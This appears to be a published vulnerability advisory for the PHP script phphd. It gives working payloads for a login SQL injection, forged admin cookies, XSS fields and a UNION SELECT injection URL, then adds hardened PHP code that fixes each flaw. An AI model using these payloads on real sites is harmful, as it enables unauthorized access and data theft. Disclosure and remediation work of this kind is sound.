PoC/Exploit for Multiple Vulnerabilities in phphd

Published Proof of Concept code - Multiple Vulnerabilities in phphd.


1. Authentication Bypass

a) SQL Injection
URL: http://host/ht/login.php
Username: ' or 1/*
Password: any

b) Cookie-based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
Cookie: userid=1
Cookie: email=aaa@aaa.com


2. Cross-Site Scripting Example
URL: http://host/phphd/add.php
Download_name: <XSS>
Version: <XSS>
Download Description: <XSS>


3. SQL Injection Example
http://host/phphd/view_link.php?file_id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
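
A hardened form of the code paths behind the three issues above, as an added example (not phphd's own code and not part of the advisory). The table and column names, the database connection values, the use of password_hash() hashes and the reading of user_level 1 as administrator are assumptions.

```php
<?php
// Added illustration, not phphd source: schema names, DSN and credentials are hypothetical.
declare(strict_types=1);
$pdo = new PDO('mysql:host=localhost;dbname=phphd;charset=utf8mb4', 'app', 'placeholder', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
session_start(['cookie_httponly' => true, 'cookie_samesite' => 'Lax']);

// 1a. Login: bind the username as data so quotes and comment markers
// cannot change the query; assumes hashes created with password_hash().
function login(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT id, level, pass_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pass_hash'])) {
        return false;
    }
    // 1b. Identity and level live in the server-side session, not in client cookies.
    session_regenerate_id(true);
    $_SESSION['userid'] = (int) $row['id'];
    $_SESSION['user_level'] = (int) $row['level'];
    return true;
}

// Assumption: level 1 is the administrator level, as the cookie values above suggest.
function isAdmin(): bool
{
    return ($_SESSION['user_level'] ?? null) === 1;
}

// 3. view_link.php: accept file_id only if it is a plain positive integer.
function fetchDownload(PDO $pdo, string $rawFileId): ?array
{
    $id = filter_var($rawFileId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT name, version, description FROM downloads WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// 2. Encode stored fields on output so markup in them renders as text.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
```

Every page that checks privileges would call isAdmin() rather than reading a cookie, and every template would pass the download name, version and description through e().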
